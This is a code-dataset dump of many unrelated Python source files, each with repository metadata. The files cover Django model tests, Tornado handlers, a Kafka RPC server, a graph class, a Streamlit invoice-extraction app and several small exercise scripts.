user = User(username='foo', email='foo@bar.com')
user.save()
assert bool(user.created_at)
assert isinstance(user.created_at, dt.datetime)
def test_password_is_nullable(self):
"""Test null password."""
user = User(username='foo', email='foo@bar.com')
user.save()
assert user.password is None
def test_factory(self, db):
"""Test user factory."""
user = UserFactory(password='myprecious')
db.session.commit()
assert bool(user.username)
assert bool(user.email)
assert bool(user.created_at)
assert user.is_admin is False
assert user.active is True
assert user.check_password('myprecious')
def test_check_password(self):
"""Check password."""
user = User.create(username='foo', email='foo@bar.com',
password='foobarbaz123')
assert user.check_password('foobarbaz123') is True
assert user.check_password('barfoobaz') is False
def test_full_name(self):
"""User full name."""
user = UserFactory(first_name='Foo', last_name='Bar')
assert user.full_name == 'Foo Bar'
def test_roles(self):
"""Add a role to a user."""
role = Role(name='admin')
role.save()
user = UserFactory()
user.roles.append(role)
user.save()
assert role in user.roles
|
[
"john_digger@hotmail.co.uk"
] |
john_digger@hotmail.co.uk
|
4cb8cf2b1b442bee39531717172c2a50c13d240b
|
a5961e847399c0b1c9d68400bb5eb4d3d5bfe165
|
/settings.py
|
378bf3085929c7dda60dbe779806b1eac5059670
|
[] |
no_license
|
robbiethegeek/drupalcores
|
58a1b12fbbe8751c8f6d704d0be555aec5a25c84
|
cc6442040bb3e8d022303cc34b5b211d39e32fc4
|
refs/heads/master
| 2020-12-25T00:19:23.420697
| 2012-05-20T23:00:34
| 2012-05-20T23:00:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
GIT_COMMIT_COUNT = "git log 8.x --oneline --since=2011-03-09 | wc -l"
GIT_LOG = "git log 8.x --pretty=format:'%h : %s' --since='2011-03-09'"
|
[
"eric.duran7@gmail.com"
] |
eric.duran7@gmail.com
|
0705c7a9e3f80b1237a7a53809691d229add1bd2
|
f7638626d1141f12fd4b2e019aa60200aee4a0f2
|
/utils/video.py
|
1d0c12b79c6ac3c6bf36c39887adea709e856034
|
[] |
no_license
|
lanewarn/lanewarn-python-backend
|
dee079fa6fca5949d2aedfd645710c3920792e83
|
23a8a65ee960516e40c3e12a6a6dea65a4197755
|
refs/heads/master
| 2020-05-22T03:36:33.899948
| 2019-05-13T09:19:58
| 2019-05-13T09:19:58
| 186,215,555
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 48
|
py
|
def bgr_to_rgb(frame): return frame[:, :, ::-1]
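# The ::-1 slice on the last axis reverses the channel order, so an (H, W, 3) BGR frame
# (e.g. as returned by cv2.imread or cv2.VideoCapture.read) becomes RGB:
#   rgb_frame = bgr_to_rgb(bgr_frame)  # bgr_frame is any NumPy array shaped (H, W, 3)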
|
[
"mail@fronbasal.de"
] |
mail@fronbasal.de
|
3f89c4833a31cad2369f99ecfcbccd9c6c382591
|
38258a7dd9acbfb7adf72983015de68a948a4826
|
/B_2000~/B_2839.py
|
8d8d1250988314bd2ea6b97cd2af25aea67f4df5
|
[] |
no_license
|
kangsm0903/Algorithm
|
13a7fe5729039a1d0ce91a574c4755a8a92fb02b
|
7d713d1c9e2e4dc30141d4f409ac1430a357065b
|
refs/heads/master
| 2022-10-04T00:33:49.247977
| 2022-09-26T12:51:16
| 2022-09-26T12:51:16
| 219,265,010
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 215
|
py
|
# 2020/01/05 Problem 2839 (Sugar Delivery)
N = int(input())
M = []
for i in range(0,N):
for k in range(0,N):
if 5*k + 3*i == N:
M.append(k+i)
try:
print(min(M))
except ValueError:
print(-1)
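# Example: N = 18 can be carried as 5 + 5 + 5 + 3, so 4 is printed;
# N = 4 has no combination of 3 kg and 5 kg bags, so min(M) raises ValueError and -1 is printed.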
|
[
"kangsm0903@naver.com"
] |
kangsm0903@naver.com
|
d68363e212719df3dd5ddd936bd78bc8ed051b7e
|
7fc3b56653be1fb3988b9f20191d4071d5e7ffd6
|
/controller/com/invalid.py
|
8d3f03b5a909a16e97a4e9e6dcc629ecbfb9ca4c
|
[] |
no_license
|
tripitakas/cbeta-reader
|
2f7e71483216ad096d16af31c29b784bdccfbeb7
|
bcb03a2623fc71ef01000a96e524333513b6d138
|
refs/heads/dev
| 2023-08-18T08:22:34.744733
| 2019-09-07T02:18:06
| 2019-09-07T02:18:06
| 198,781,206
| 1
| 0
| null | 2023-08-14T21:51:09
| 2019-07-25T07:32:13
|
CSS
|
UTF-8
|
Python
| false
| false
| 3,886
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@desc: home page
@time: 2018/6/23
"""
from operator import itemgetter
from os import path
from controller.base import BaseHandler
from controller.role import get_route_roles
import re
import inspect
class InvalidPageHandler(BaseHandler):
def prepare(self):
pass # ignore roles
def get(self):
req_path = self.request.path
if '/api/' in req_path:
self.set_status(404, reason='Not found')
return self.finish()
if len(req_path) > 1 and path.exists(path.join(self.get_template_path(), req_path.replace('/', ''))):
return self.render(req_path.replace('/', ''))
self.set_status(404, reason='Not found')
self.render('_404.html')
def post(self):
self.get()
class ApiTable(BaseHandler):
URL = '/api'
def get(self):
""" 显示后端API和前端路由 """
def get_doc():
assert func.__doc__, str(func) + ' no comment'
return func.__doc__.strip().split('\n')[0]
handlers = []
for cls in self.application.handlers:
handler = cls(self.application, self.request)
file = 'controller' + re.sub(r'^.+controller', '', inspect.getsourcefile(cls))
file += '\n' + inspect.getsource(cls).split('\n')[0][:-1]
for method in handler._get_methods().split(','):
method = method.strip()
if method != 'OPTIONS':
func = cls.__dict__[method.lower()]
func_name = re.sub(r'<|function |at .+$', '', str(func)).strip()
self.add_handlers(cls, file, func_name, get_doc, handlers, method)
handlers.sort(key=itemgetter(0))
self.render('_api.html', version=self.application.version, handlers=handlers)
@staticmethod
def add_handlers(cls, file, func_name, get_doc, handlers, method):
def show_roles(roles):
if 'MyTaskHandler.' in func_name:
return '普通用户'
return ','.join(r for r in roles if not re.search(r'员|专家', r) or '普通用户' not in roles)
def add_handler(url, idx=0):
added = 0
if '@box_type' in url:
for s, box_type in enumerate(['block', 'char', 'column', 'text']):
sub_url = url.replace('@box_type', box_type)
roles = get_route_roles(sub_url, method)
if roles:
added += len(roles)
handlers.append((sub_url, func_name, idx * 10 + s + 1, file, get_doc(), show_roles(roles)))
if not added:
roles = get_route_roles(url, method)
handlers.append((url, func_name, idx, file, get_doc(), show_roles(roles)))
if isinstance(cls.URL, list):
for i, url_ in enumerate(cls.URL):
add_handler(url_, i + 1)
else:
add_handler(cls.URL)
class ApiSourceHandler(BaseHandler):
URL = '/api/code/(.+)'
def get(self, name):
""" 显示后端API的源码 """
for cls in self.application.handlers:
handler = cls(self.application, self.request)
for method in handler._get_methods().split(','):
method = method.strip()
if method != 'OPTIONS':
func = cls.__dict__[method.lower()]
func_name = re.sub(r'<|function |at .+$', '', str(func)).strip()
if func_name == name:
file = 'controller' + re.sub(r'^.+controller', '', inspect.getsourcefile(cls))
src = inspect.getsource(cls).strip()
return self.render('_api_src.html', name=name, file=file, src=src)
self.render('_error.html', code=404, message=name + '不存在')
|
[
"rhcad@hotmail.com"
] |
rhcad@hotmail.com
|
8d44e6495866ff65d6d79b08f18b96420fd02105
|
b3ec5214dc326751ca89ae6c410ad9df5550d727
|
/全局变量.py
|
cd1394044b1adb9e842f51e11e740e8d1000cb9e
|
[] |
no_license
|
Ephemeral1026/python-
|
c77cae6ad93fcd8847de8da2e845de3e071d4c73
|
8c27f79f40c3efe43eb585779c4afaf52409c2cf
|
refs/heads/master
| 2020-04-17T13:43:50.642080
| 2019-02-28T06:31:26
| 2019-02-28T06:31:26
| 166,627,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 140
|
py
|
x=2
def fun1():
print(x,end=" ")
def fun2():
global x
x=x+1
print(x,end=" ")
fun1()
fun2()
print(x,end=" ")
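# Expected output: 2 3 3
# fun1 reads the global x (2); fun2 declares "global x", increments it to 3 and prints it;
# the final print then sees the updated global value 3.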
|
[
"noreply@github.com"
] |
Ephemeral1026.noreply@github.com
|
6f866edffe692f8f5ccb9945f336a75fdfccb83d
|
e9e0b9f0de4751ba734c75745e6be24d7609af05
|
/CodeGenServer.py
|
ab710ae85f2f6d24ac0174f560808a6903ff7ae7
|
[] |
no_license
|
pnjha/RPC-Kafka
|
4f62e64aec4120c05265ddc9f98b4a421108a09c
|
55c8c88a67f50613d04922ecda792e6a39b9bb93
|
refs/heads/master
| 2022-04-05T17:22:58.995627
| 2020-02-09T14:28:54
| 2020-02-09T14:28:54
| 239,317,576
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,010
|
py
|
import os
import sys
import json
import pickle
import threading as th
from kafka import KafkaProducer
from kafka import KafkaConsumer
from kafka.errors import KafkaError
from Server import Server as Server
def produce_topic(topic_name,receiver_id,value,kafka_id):
producer = KafkaProducer(retries=5,bootstrap_servers=kafka_id,key_serializer=lambda m: json.dumps(m).encode('utf-8'),value_serializer=lambda m: json.dumps(m).encode('utf-8'))
producer.send(topic_name,key=receiver_id,value=value)
producer.flush()
print(value)
def consume_topic(function_name,server_id):
consumer = KafkaConsumer(function_name,group_id=server_id,bootstrap_servers=server_id,key_deserializer=lambda m: json.loads(m.decode('utf-8')),value_deserializer=lambda m: json.loads(m.decode('utf-8')))
server_impl_obj = Server()
for message in consumer:
if message.key == server_id:
client_id = message.value["id"]
request = message.value["param_value"]
function = getattr(server_impl_obj,function_name)
val = function(**request)
reply = {}
reply['response_value'] = val
produce_topic(function_name,client_id,reply,server_id)
def main(server_id,server_IP,server_port):
    temp_functions_list = dir(Server)
    functions_list = []
    for item in temp_functions_list:
if "__" not in item:
functions_list.append(item)
reply = {}
reply["functions_list"] = functions_list
produce_topic("functions_list","default",reply,server_id)
for function_name in functions_list:
th.Thread(target=consume_topic, args=(function_name,server_id)).start()
if __name__ == '__main__':
if len(sys.argv) != 3:
print ("Invalid argument format\n Correct usage:python3 [filename][IP Address][Port Number]")
exit()
server_IP = str(sys.argv[1])
server_port = str(sys.argv[2])
server_id = server_IP+":"+server_port
main(server_id,server_IP,server_port)
|
[
"prakash.nath@students.iiit.ac.in"
] |
prakash.nath@students.iiit.ac.in
|
11d15ed90725ea8f612d4328b52f560ef8e3e3bf
|
af30e0e378a0028a1d65951491174b6bc685e4c6
|
/11399.py
|
33cbfe96bd38692392db2092bae493af0dab4783
|
[] |
no_license
|
JungAh12/BOJ
|
cb54cfddc041b3b807b1c98d5327d717f9a325fb
|
709ff8f909aa686fe83c7b25d5f30445a50fbb7d
|
refs/heads/master
| 2020-09-11T01:04:47.310521
| 2019-11-29T16:15:49
| 2019-11-29T16:15:49
| 221,888,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
N = int(input())
P = list(map(int,input().split(' ')))
P = sorted(P)
res = 0
for i in range(N):
res += sum(P[:i+1])
print(res)
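# Example (BOJ 11399): N = 5 with times "3 1 4 3 2" sorts to [1, 2, 3, 3, 4];
# the prefix sums 1 + 3 + 6 + 9 + 13 give the minimum total waiting time 32.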
|
[
"vml_yg@naver.com"
] |
vml_yg@naver.com
|
13e49560092f02899f60735a3e9a929d4b2522a9
|
3247e4a00da2e46834a18fe5b77e0d11a0d1b2b2
|
/8.1_Graph.py
|
27ef10bffef824bfa9b6873b122097d92d68cb20
|
[] |
no_license
|
kriyazhao/Python-DataStructure-Algorithms
|
90ab0e179143480b377a544b2595a5cc49120141
|
c7255d5f6c461e18c43c472299269a771779b500
|
refs/heads/master
| 2021-01-20T09:09:44.938910
| 2014-07-15T00:44:29
| 2014-07-15T00:44:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,950
|
py
|
#------------------------------------------------------------------------------------------------------------
# Vertex class to store node in the graph
class Vertex:
def __init__(self, key):
self.id = key
self.connectedTo = {} # store connected vertex and weight of the edge
self.distance = 0
self.pred = None
self.color = "white"
self.disTime = 0
self.finTime = 0
def addNeighbor(self, nbr, weight = 0):
self.connectedTo[nbr] = weight
def __str__(self):
return str(self.id) + " is connected to: " + str([x.id for x in self.connectedTo])
def getConnections(self):
return self.connectedTo.keys()
def getID(self):
return self.id
def getWeight(self, nbr):
return self.connectedTo[nbr]
def getDistance(self):
return self.distance
def setDistance(self, dis):
self.distance = dis
def getPred(self):
return self.pred
def setPred(self, predVert):
self.pred = predVert
def getColor(self):
return self.color
def setColor(self, color):
self.color = color
def getDiscovery(self):
return self.disTime
def setDiscovery(self, time):
self.disTime = time
def getFinish(self):
return self.finTime
def setFinish(self, time):
self.finTime = time
#------------------------------------------------------------------------------------------------------------
# Graph class
class Graph:
def __init__(self):
self.vertList = {}
self.vertCount = 0
def addVertex(self, key):
if key in self.vertList:
raise KeyError
else:
self.vertCount += 1
newVertex = Vertex(key)
self.vertList[key] = newVertex
def getVertex(self, key):
if key in self.vertList:
return self.vertList[key]
else:
return None
def __contains__(self, key):
return key in self.vertList
def addEdge(self, fromVert, toVert, cost = 0):
if fromVert not in self.vertList:
self.addVertex(fromVert)
if toVert not in self.vertList:
self.addVertex(toVert)
self.vertList[fromVert].addNeighbor(self.vertList[toVert], cost)
def getVertices(self):
return self.vertList.keys()
def __iter__(self):
return iter(self.vertList.values())
myGragh = Graph()
for i in range(6):
myGragh.addVertex(i)
for vertID in myGragh:
print vertID.id
myGragh.addEdge(0,1,5)
myGragh.addEdge(0,5,2)
myGragh.addEdge(1,2,4)
myGragh.addEdge(2,3,9)
myGragh.addEdge(3,4,7)
myGragh.addEdge(3,5,3)
myGragh.addEdge(4,0,1)
myGragh.addEdge(5,4,8)
myGragh.addEdge(5,2,1)
for vert in myGragh:
for connection in vert.getConnections():
print "{0} is connected to {1} with a cost of {2}".format(vert.getID(), connection.getID(),vert.getWeight(connection))
|
[
"kriyazhao@users.noreply.github.com"
] |
kriyazhao@users.noreply.github.com
|
c7771f3e6c54d6ad3a33c0e804aac0782acc4220
|
836d5f7190f6b4503e758c87c71598f18fdfce14
|
/9-String-İşlemleri/String-Find-Rfind-Methodu.py
|
476d3632d57bd5f8e65d24e5cbc90a8fe7081687
|
[] |
no_license
|
S-Oktay-Bicici/PYTHON-PROGRAMMING
|
cf452723fd3e7e8ec2aadc7980208d747c502e9a
|
22e864f89544249d6309d6f4570a4104bf47346b
|
refs/heads/main
| 2021-11-30T00:19:21.158084
| 2021-11-16T15:44:29
| 2021-11-16T15:44:29
| 316,716,147
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
#####################################################################
a = "sadık oktay biçici"
# find() returns the index at which the searched character first occurs in the string
# it searches from left to right
print(a.find("ı"))
# to search only within a given range
print(a.find("t",2,14))
#####################################################################
a = "sadık oktay biçici"
# rfind() is the opposite of find(): it searches from right to left
print(a.rfind("t"))
#####################################################################
|
[
"noreply@github.com"
] |
S-Oktay-Bicici.noreply@github.com
|
02be514a10bdb2a7ec4770600dfb54abf2a86aa7
|
bf14a56f2f03a99a87bf455c3c4a5be9760c9db6
|
/users/migrations/0005_remove_members_auth.py
|
40033fa617189c47240b28acbda9095fdf2c9f67
|
[] |
no_license
|
axxsxbxx/T4IR_petppo
|
84833e4096052023fb633111fa57a623009fbcad
|
ecf8e890bbb20bad7f41d0c76908fa1e27c6eda0
|
refs/heads/master
| 2023-01-07T05:16:39.466043
| 2020-11-12T09:43:02
| 2020-11-12T09:43:02
| 291,868,850
| 0
| 0
| null | 2020-09-04T05:50:04
| 2020-09-01T01:53:34
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 317
|
py
|
# Generated by Django 3.1 on 2020-09-03 00:30
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0004_members_auth'),
]
operations = [
migrations.RemoveField(
model_name='members',
name='auth',
),
]
|
[
"ansubin2004@gmail.com"
] |
ansubin2004@gmail.com
|
da8a1916b309ed9a259ff22ed0d10c83f5ba5a33
|
b2329ecbfc753142659b59d84b3bc9b6f9a035d2
|
/app.py
|
02b8d781db3fa0ac2431b16741aeffa9f58e0aa7
|
[] |
no_license
|
SantoshAIMLProjects/Invoice_Processing
|
a93c2742f7d2d43fe85f3c08901c50a2c3a34207
|
7e18b6f486e2d5be949316ca1595898afafcfe0e
|
refs/heads/master
| 2023-09-02T20:27:38.436505
| 2021-11-14T19:42:11
| 2021-11-14T19:42:11
| 427,994,350
| 0
| 0
| null | 2021-11-14T19:42:11
| 2021-11-14T17:26:52
|
Python
|
UTF-8
|
Python
| false
| false
| 2,244
|
py
|
import streamlit as st
import pandas as pd
from matplotlib import pyplot as plt
from plotly import graph_objs as go
from extract_img import *
from PIL import Image
data = pd.read_csv("output1.csv")
st.title("Invoice Processing")
#roi = [[(1073, 95), (1199, 115), 'Text', 'Company_Name'],
# [(109, 350), (207, 378), 'Text', 'Invoice_Date'],
# [(994, 350), (1091, 378), 'Text', 'Invoice_Number'],
# [(1000, 230), (1141, 246), 'Text', 'Mobile_Number']]
roi= [[(84, 74), (269, 92), 'Text', 'Company_Name'],
[(89, 226), (252, 258), 'Text', 'Invoice_Number'],
[(694, 226), (882, 257), 'Text', 'Invoice_Date'],
[(133, 118), (225, 134), 'Text', 'Mobile_Number']]
def main():
st.header("AI Invoice Processing")
#st.write("Main function")
nav = st.sidebar.radio("Navigation",['Home','Extract','Analytics'])
if nav == 'Home':
st.write("We are processing invoices and extracting some fileds and storing in Database.Also we verify with source system")
elif nav == 'Extract':
input_img = st.file_uploader("Please upload image file.....")
if input_img is not None:
img = Image.open(input_img)
img_arr = np.array(img)
img_gray = cv2.cvtColor(img_arr,cv2.COLOR_BGR2GRAY)
threshold_img = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]
#img = input_img.copy()
#st.write(type(img_arr))
st.image(img_arr,caption='Input Invoice')
st.image(img_gray,caption='Gray Invoice')
st.image(threshold_img,caption ='Threshold Image')
#preprocess_img= preprocess_image(img_gray)
#st.image(preprocess_img,caption='Pre-Processed Invoice')
#st.image(preprocess_image(input_img))
extract_img(threshold_img,roi)
print("Data extraction completed")
#path = st.file_uploader("Input the file path")
option = st.selectbox("Please select one",("Eng_To_Eng","Eng_To_Ara","Ara_To_Ara","Ara_To_Eng"))
if st.checkbox("Show Data"):
st.table(data)
elif nav == 'Analytics':
st.write("We show analytics of our app")
if __name__ == '__main__':
main()
|
[
"apple@Apples-MacBook-Pro.local"
] |
apple@Apples-MacBook-Pro.local
|
fdf6431a2bb9ec7423502542bfc62b42f6cdd1cc
|
1000b899b480c90308cb2424391cbd5bdc18b03a
|
/emails/forms.py
|
d41e657c0301378e786bbb7d9317c5620faf0dde
|
[] |
no_license
|
crazy36/Emails-app
|
685891cebbc6756c5ab9a4b2d371451d2acd2a0e
|
15daa27f82617598611ba84fc897cc4584075684
|
refs/heads/master
| 2020-03-18T16:17:29.730927
| 2018-05-26T11:58:47
| 2018-05-26T11:58:47
| 134,957,608
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 613
|
py
|
#emails/forms.py
# -*- coding: UTF-8 -*-
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
class MessageForm(forms.Form):
recipient=forms.ModelChoiceField(label=_("Recipient"),queryset=User.objects.all(),required=True,)
message=forms.CharField(label=_("Message"),widget=forms.Textarea,required=True,)
def __init__(self,request,*args,**kwargs):
super(MessageForm,self).__init__(*args,**kwargs)
self.request=request
self.fields['recipient'].queryset=\
self.fields['recipient'].queryset.\
exclude(pk=request.user.pk)
|
[
"crazyhero365@gmail.com"
] |
crazyhero365@gmail.com
|
b8a9302e8da44e7a908893ab4b7e4f14686ddd21
|
bcb8337b488f6acb91b700a2312a5b2018855413
|
/federatedml/ftl/test/functional_test/functional_load_data_test.py
|
ac35eff06742ae316f8a3664bb6393b32ad11a34
|
[
"Apache-2.0"
] |
permissive
|
freeeedooom/FATE
|
d17a4729f059cfec6bc07c3142bebcd3b470dc3c
|
7bbce8ee037543f280791378681742b40a300b0a
|
refs/heads/master
| 2020-08-19T12:15:22.517131
| 2019-10-17T07:09:22
| 2019-10-17T07:09:22
| 215,918,890
| 1
| 0
|
Apache-2.0
| 2019-10-18T01:45:43
| 2019-10-18T01:45:43
| null |
UTF-8
|
Python
| false
| false
| 1,919
|
py
|
import numpy as np
from arch.api.eggroll import init
from federatedml.ftl.data_util.common_data_util import load_data, feed_into_dtable
from federatedml.ftl.test.util import assert_array, assert_matrix
if __name__ == '__main__':
expected_ids = np.array([133, 273, 175, 551, 199, 274])
expected_y = np.array([1, 1, 1, 1, -1, -1])
expected_X = np.array([[0.254879, -1.046633, 0.209656, 0.074214, -0.441366, -0.377645],
[-1.142928, - 0.781198, - 1.166747, - 0.923578, 0.62823, - 1.021418],
[-1.451067, - 1.406518, - 1.456564, - 1.092337, - 0.708765, - 1.168557],
[-0.879933, 0.420589, - 0.877527, - 0.780484, - 1.037534, - 0.48388],
[0.426758, 0.723479, 0.316885, 0.287273, 1.000835, 0.962702],
[0.963102, 1.467675, 0.829202, 0.772457, - 0.038076, - 0.468613]])
infile = "../../../../examples/data/unittest_data.csv"
ids, X, y = load_data(infile, 0, (2, 8), 1)
ids = np.array(ids, dtype=np.int32)
X = np.array(X, dtype=np.float64)
y = np.array(y, dtype=np.int32)
print("ids shape", ids.shape)
print("X shape", X.shape)
print("y shape", y.shape)
assert_array(expected_ids, ids)
assert_array(expected_y, y)
assert_matrix(expected_X, X)
expected_data = {}
for i, id in enumerate(expected_ids):
expected_data[id] = {
"X": expected_X[i],
"y": expected_y[i]
}
init()
data_table = feed_into_dtable(ids, X, y.reshape(-1, 1), (0, len(ids)), (0, X.shape[-1]))
for item in data_table.collect():
id = item[0]
inst = item[1]
expected_item = expected_data[id]
X_i = expected_item["X"]
y_i = expected_item["y"]
features = inst.features
label = inst.label
assert_array(X_i, features)
assert y_i == label
|
[
"jicezeng@gmail.com"
] |
jicezeng@gmail.com
|
66f5307ace7c6521c16e10552a93770a9dd8774b
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_10/100.py
|
2dbfeb80c477a2f752aaf4706fd43b0a463f8780
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,232
|
py
|
from __future__ import with_statement
from optparse import OptionParser
import sys
def process(in_file, out_file):
num_cases = int(in_file.readline())
for case in xrange(1, num_cases+1):
print 'Case #%d:' % case
result = 0
p, k, l = [int(x) for x in in_file.readline().split(' ')]
#print p, k, l
frequencies = sorted([int(x) for x in in_file.readline().split(' ')])
i, place = 0, 0
for f in reversed(frequencies):
if i % k == 0:
place += 1
result += place * f
i += 1
out_file.write('Case #%d: %d\n' % (case, result))
def main():
parser = OptionParser(usage="""\
Usage: %prog [options]""")
parser.add_option('-i', '--input_file',
type='string', action='store')
parser.add_option('-o', '--output_file',
type='string', action='store')
opts, args = parser.parse_args()
if not opts.input_file or not opts.output_file:
parser.print_help()
sys.exit(1)
with open(opts.input_file, 'r') as i:
with open(opts.output_file, 'w') as o:
process(i, o)
if __name__ == '__main__':
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
3aa0c8ef351c4ec055091dc563483f9b0ffaca94
|
af05499aed459da984b0ce93e6424aa74766ba62
|
/turtle/initial.py
|
ad3e12fd07e584262a0c5eaebae0bb1cc3744b18
|
[] |
no_license
|
alxayeed/Programming-Foundations-with-Python
|
72fd64e928941637e6c320b00c218e627c3faa71
|
eca4c67a011a2b6e9964cf7df0cd8c0486272daf
|
refs/heads/master
| 2020-07-06T20:09:56.073152
| 2019-08-14T14:11:09
| 2019-08-14T14:11:09
| 203,127,026
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 84
|
py
|
#A program to graphically show my Initial
import turtle  # fixed typo: was "import tutle"
name = turtle.Turtle()
name  # no-op: the drawing commands for the initial have not been added yet
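# A minimal sketch of what the drawing step could look like (the letter "A" here is
# only an illustrative choice; any initial works the same way):
#   name.penup(); name.goto(-20, -40); name.pendown()
#   name.goto(0, 40); name.goto(20, -40)
#   name.penup(); name.goto(-10, 0); name.pendown(); name.goto(10, 0)
#   turtle.done()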
|
[
"alxayeed@gmail.com"
] |
alxayeed@gmail.com
|
a3c62b7908f21f4cd6024e83cfc4a6a3eaa23fc8
|
cbbd094c5a8b6cf2d3f41fdf114c3988d85ec572
|
/caso voley/Sexo.py
|
e298f945c76fc1605a49cfb10e95f7aaae5c53d5
|
[] |
no_license
|
JhonTorres001/-Caso-voley-
|
c96add61f3efd1523a7c2ca6c878952f14ec1e76
|
9ffbeedb838684fc8f7e81b7791b8ecf90410147
|
refs/heads/master
| 2022-12-08T08:31:19.745461
| 2020-08-31T22:49:55
| 2020-08-31T22:49:55
| 291,840,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
class Sexo(object):
def __init__(self):
self.Descripcion = ""
self.IdSexo = 0
self.persona = None
# Start of user code -> properties/constructors for Sexo class
# End of user code
# Start of user code -> methods for Sexo class
# End of user code
|
[
"tomcat@ip-172-31-19-198.eu-west-1.compute.internal"
] |
tomcat@ip-172-31-19-198.eu-west-1.compute.internal
|
2b300e5644cfb953674e2fc0496acc9e2812c030
|
6fa40af69b8cc2ccaa974851ee7d9d0fe0056931
|
/app/core/tests/test_models.py
|
18cff09bd48363bd924ae44825eea87f48e763f3
|
[
"MIT"
] |
permissive
|
Bartosz-L/recipe-app_django-rest-api
|
5bef77711e53fb2a5d4c09731085e5af067fc2ac
|
b87abc8db57c228aa2181c91731bd8ea6cbd233a
|
refs/heads/master
| 2022-11-29T22:15:14.081191
| 2019-11-05T13:14:52
| 2019-11-05T13:14:52
| 185,169,273
| 0
| 0
|
MIT
| 2022-11-22T04:09:13
| 2019-05-06T09:50:15
|
Python
|
UTF-8
|
Python
| false
| false
| 2,615
|
py
|
from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@test.com', password='testpassword'):
# create a sample user
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
# test creating a new user with an email is successful
def test_create_user_with_email_successful(self):
email = 'test@test.com'
password = 'TestP@ssword123'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
# test the email for a new user is normalized
def test_new_user_email_normalized(self):
email = 'test@TEST.COM'
user = get_user_model().objects.create_user(email, 'test123')
self.assertEqual(user.email, email.lower())
# test creating user with no email raises error
def test_new_user_invalid_email(self):
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, 'test123')
def test_create_new_superuser(self):
user = get_user_model().objects.create_superuser(
'test@test.com',
'test123'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_tag_str(self):
# test the tag string representation
tag = models.Tag.objects.create(
user=sample_user(),
name='Vegan'
)
self.assertEqual(str(tag), tag.name)
def test_ingredient_str(self):
# test the ingredient string representation
ingredient = models.Ingredient.objects.create(
user=sample_user(),
name='Cucumber'
)
self.assertEqual(str(ingredient), ingredient.name)
def test_recipe_str(self):
        # test the recipe string representation
recipe = models.Recipe.objects.create(
user=sample_user(),
title='Steak and mushroom sauce',
time_minutes=5,
price=5.00
)
self.assertEqual(str(recipe), recipe.title)
@patch('uuid.uuid4')
def test_recipe_file_name_uuid(self, mock_uuid):
# test that image is saved in the correct location
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.recipe_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/recipe/{uuid}.jpg'
self.assertEqual(file_path, exp_path)
|
[
"bligeza@tidk.pl"
] |
bligeza@tidk.pl
|
0e5e5b102ac23f3e61ac0c30aeb4a7aab83ba124
|
4f6fdd0effc474226b75ccc5d247509121b90fdf
|
/number programs/prime numbers in a range using sieve of eratosthenes.py
|
345af39b62771b7ab9eff038c23fc4ba11236ff4
|
[] |
no_license
|
tuhiniris/Python-ShortCodes-Applications
|
1580785a6922c70df3b7375cb81e98f4a684d86f
|
f3fe7ac1c11a631fcd05b9d19b25b1a841d94550
|
refs/heads/main
| 2023-04-07T21:42:21.094545
| 2021-04-21T07:47:46
| 2021-04-21T07:47:46
| 358,605,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
##n=int(input("Enter upper limit of range: "))
##sieve=set(range(2,n+1))
##while sieve:
## prime=min(sieve)
## print(prime,end="\t")
## sieve-=set(range(prime,n+1,prime))
##
##print()
N=int(input("Input the value of N: "))
Primes=[True for k in range(N+1)]
p=2
Primes[1]=False
Primes[0]=False
while(p*p<=N):
if Primes[p]==True:
for j in range(p*p,N+1,p):
Primes[j]=False
p+=1
for i in range(2,N+1):  # include N itself when listing the primes
if Primes[i]:
print(i,end=' ')
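# Example: N = 30 prints 2 3 5 7 11 13 17 19 23 29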
|
[
"noreply@github.com"
] |
tuhiniris.noreply@github.com
|
21fa8e09e692dd0fa8a2eb21bacd409ae98bd920
|
cedfd8fb58763f2b57575b92a3b4fcb73ac5d35d
|
/flak.py
|
158723d5259c11ebb88b8b9f8fe81048921ce4b7
|
[] |
no_license
|
Alex-Huleatt/Fun
|
48d0c5004168479596c03210ab4d5cb8ffdbb92e
|
3764e07d38af8ad51ee662a355d691c358346109
|
refs/heads/master
| 2021-01-16T20:24:40.906388
| 2017-08-25T16:19:56
| 2017-08-25T16:19:56
| 100,203,310
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
#!/usr/bin/env python
import sys
def e(c):
